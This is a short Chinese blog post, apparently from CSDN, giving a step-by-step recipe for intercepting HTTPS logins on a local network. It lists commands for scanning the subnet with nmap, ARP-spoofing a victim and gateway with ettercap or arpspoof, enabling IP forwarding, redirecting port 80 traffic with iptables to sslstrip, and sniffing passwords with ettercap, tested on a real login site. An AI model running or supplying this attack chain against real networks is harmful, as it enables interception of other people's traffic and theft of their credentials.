基于https的内网嗅探-ssl数据嗅探工具sslstrip

内网扫描 nmap -sP  192.168.1.1/24​

ettercap -T -q -i wlan0 -M arp:remote /192.168.1.102/192.168.1.1/

ettercap使用方法,参数详解:
-P  使用插件
-T  使用基于文本界面
-q  启动安静模式(不回显)
-M  启动ARP欺骗攻击
192.168.1.102/ 被攻击的目标主机,第二个192.168.1.1网关ip

或者 命令:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102

开启转发,重新开启一个命令行:

echo "1">/proc/sys/net/ipv4/ip_forward

使用Iptables过滤数据包

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

通过iptables 把所有http数据导入到10000端口,我们用sslstrip监听10000端口,并得到我们想要的数据
参数讲解: 
-t:命令要操作匹配的表(net这个表表示被查询时遇到了新差生的连接包)
Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT(修改路由之前本地的包)、POSTROUTING(修改准备出去的包)
-A表示在选择的链后加入更多选项
–p指被过滤包的协议

–destination-port 80指被过滤包的目的端口是80 -j REDIRECT –to-port 10000 将80端口的数据跳转到指定端口传输

然后我们使用sslstrip监听10000端口,命令行如下

sslstrip -p -l 10000 -w log.txt

sslstrip -a -f -k

测试登录网址 登录 - 开心网

欺骗成功,然后利用ettercap进行https/http密码嗅探

Kali终端输入:ettercap -Tq -i eth0
-T:启动文本模式  q:安静模式  -i:攻击机网卡

关闭命令 -A 改成 -D

iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值